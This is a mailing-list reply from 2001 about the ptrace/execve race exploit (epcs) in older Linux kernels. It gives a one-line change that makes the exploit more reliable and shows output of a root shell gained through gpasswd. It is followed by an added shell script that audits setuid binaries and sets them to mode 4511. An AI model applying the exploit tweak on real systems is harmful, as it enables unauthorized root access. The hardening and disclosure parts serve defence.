Mariusz Woloszyn wrote:
>
> On Tue, 27 Mar 2001, Wojciech Purczynski wrote:
>
> >
> > Hi,
> >
> > Here is exploit for ptrace/execve race condition bug in Linux kernels up
> > to 2.2.18.
> >
>
> Hi!
>
> I've seen a tool that works better than this, using a different approach to
> the same bug; it exploits it on all platforms, giving instant root without the
> need to cat garbage files to clear the disk cache!!!
Even with the original exploit code there is a 99.99% chance to gain root access if
you change the line:

    regs.eip=eip;

to:

    regs.eip=regs.esp;

and don't call objdump on the targeted binary beforehand (use only the binary name as
argument to epcs). At least with 'exotic' suid binaries like uux or gpasswd, which are
*never* in the disk cache, you will get instant root too.
    paul@ps:/usr/home/paul/tmp2 > ./epcs /usr/bin/gpasswd
    Bug exploited successfully.
    sh-2.04# id
    uid=0(root) gid=0(root) groups=100(users)
    sh-2.04#
Clever admins would chmod 4511 their suid binaries.
Ihq.
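As an added example (not code from the original post, and not part of epcs), here is a small shell script that does the hardening step the post ends with: it lists setuid binaries under a directory that are still readable by group or other, and sets them to mode 4511 so unprivileged users can no longer read or disassemble them. It assumes a POSIX find with -perm and -xdev; the function names are mine. Note that removing the read bit is a hardening measure only, it does not fix the kernel race itself.

```shell
#!/bin/sh
# Added example: find setuid files that are readable by group or other,
# and optionally set them to mode 4511 (setuid, owner r-x, group/other x).
# Assumes POSIX find (-xdev, -type, -perm). Function names are hypothetical.

# find_readable_suid DIR
#   Print, sorted, every regular file under DIR on the same filesystem that
#   has the setuid bit set (-perm -4000) AND is readable by group (-perm -040)
#   or by other (-perm -004).
find_readable_suid() {
    find "$1" -xdev -type f -perm -4000 \
        \( -perm -040 -o -perm -004 \) -print 2>/dev/null | sort
}

# harden_suid DIR
#   Apply mode 4511 to every file reported by find_readable_suid and echo
#   each path that was changed. Must run as the file owner (normally root)
#   to take effect on system binaries.
harden_suid() {
    find_readable_suid "$1" | while IFS= read -r f; do
        chmod 4511 "$f" && echo "$f"
    done
}

# Usage (run as root on a real system):
#   find_readable_suid /usr/bin      # audit only
#   harden_suid /usr/bin             # audit and fix
```

Run the audit function first and review the list; binaries that must stay readable for some local reason can be excluded before running the hardening function.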